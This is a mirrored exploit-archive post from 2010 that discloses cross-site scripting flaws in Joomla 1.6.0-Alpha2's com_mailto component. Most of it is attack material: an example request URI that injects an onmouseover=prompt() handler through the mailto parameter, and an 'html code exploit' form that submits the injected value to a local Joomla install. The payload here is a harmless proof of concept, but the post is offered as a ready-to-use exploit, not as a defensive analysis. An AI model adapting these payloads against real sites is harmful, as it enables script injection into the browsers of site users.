Home / os / win7

Joomla 1.6.0-Alpha2 XSS Vulnerabilities

Posted on 03 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Joomla 1.6.0-Alpha2 XSS Vulnerabilities </title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>======================================= Joomla 1.6.0-Alpha2 XSS Vulnerabilities ======================================= # Title:Joomla_1.6.0-Alpha2 XSS Vulnerabilities # Date: 2010-05-02 # Software Link: http://joomlacode.org/gf/download/frsrelease/11322/45252/Joomla_1.6.0-Alpha2-Full-Package.zip # Version: 1.6.0-alpha2 # Tested on: [relevant os] [:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::] &gt;&gt; General Information Advisory/Exploit Title = Joomla_1.6.0-Alpha2 XSS Vulnerabilities [:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::] &gt;&gt; Product information Name = Joomla Vendor = Joomla Vendor Website = http://www.joomla.org/ Affected Version(s) = 1.6.0-Alpha2 [:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::] &gt;&gt; #1 Vulnerability Type = XSS ( POST ) mailto,subject,from,sender Example URI = option=com_mailto&amp;task=user%2Elogin&amp;32720689cad34365fbe10002f91e50a9=1&amp;mailto=%F6&quot;+onmouseover=prompt(406426661849)//&amp;sender=mega-itec@mega-ite.com&amp;from=mega-itec@mega-ite.com&amp;subject=mega-itec@mega-ite.com&amp;layout=default&amp;tmpl=component&amp;link=encode link with base 64 &gt;&gt; #2 html code exploit : &lt;form action=&quot;http://localhost/Joomla_1.6.0-Alpha2-Full-Package/index.php&quot; name=&quot;mailtoForm&quot; method=&quot;post&quot;&gt; &lt;div style=&quot;padding: 10px;&quot;&gt; &lt;div style=&quot;text-align:right&quot;&gt; &lt;a href=&quot;javascript: void window.close()&quot;&gt; Close Window &lt;img src=&quot;http://localhost/Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png&quot; border=&quot;0&quot; alt=&quot;&quot; title=&quot;&quot; /&gt;&lt;/a&gt; &lt;/div&gt; &lt;h2&gt; E-mail this link to a friend. &lt;/h2&gt; &lt;p&gt; E-mail to: &lt;br /&gt; &lt;input type=&quot;text&quot; name=&quot;mailto&quot; class=&quot;inputbox&quot; size=&quot;25&quot; value=&quot;&amp;#65533;&quot; onmouseover=prompt(406426661849)//&quot;/&gt; &lt;/p&gt; &lt;p&gt; Sender: &lt;br /&gt; &lt;input type=&quot;text&quot; name=&quot;sender&quot; class=&quot;inputbox&quot; value=&quot;mega-itec@mega-ite.com&quot; size=&quot;25&quot; /&gt; &lt;/p&gt; &lt;p&gt; Your E-mail: &lt;br /&gt; &lt;input type=&quot;text&quot; name=&quot;from&quot; class=&quot;inputbox&quot; value=&quot;mega-itec@mega-ite.com&quot; size=&quot;25&quot; /&gt; &lt;/p&gt; &lt;p&gt; Subject: &lt;br /&gt; &lt;input type=&quot;text&quot; name=&quot;subject&quot; class=&quot;inputbox&quot; value=&quot;mega-itec@mega-ite.com&quot; size=&quot;25&quot; /&gt; &lt;/p&gt; &lt;p&gt; &lt;button class=&quot;button&quot; onclick=&quot;return submitbutton('send');&quot;&gt; Send &lt;/button&gt; &lt;button class=&quot;button&quot; onclick=&quot;window.close();return false;&quot;&gt; Cancel &lt;/button&gt; &lt;/p&gt; &lt;/div&gt; &lt;input type=&quot;hidden&quot; name=&quot;layout&quot; value=&quot;default&quot; /&gt; &lt;input type=&quot;hidden&quot; name=&quot;option&quot; value=&quot;com_mailto&quot; /&gt; &lt;input type=&quot;hidden&quot; name=&quot;task&quot; value=&quot;send&quot; /&gt; &lt;input type=&quot;hidden&quot; name=&quot;tmpl&quot; value=&quot;component&quot; /&gt; &lt;input type=&quot;hidden&quot; name=&quot;link&quot; value=&quot;encode you link with base64&quot; /&gt; &lt;input type=&quot;hidden&quot; name=&quot;4b42dc29b4b226460d1b510634e21864&quot; value=&quot;1&quot; /&gt;&lt;/form&gt; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-03]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP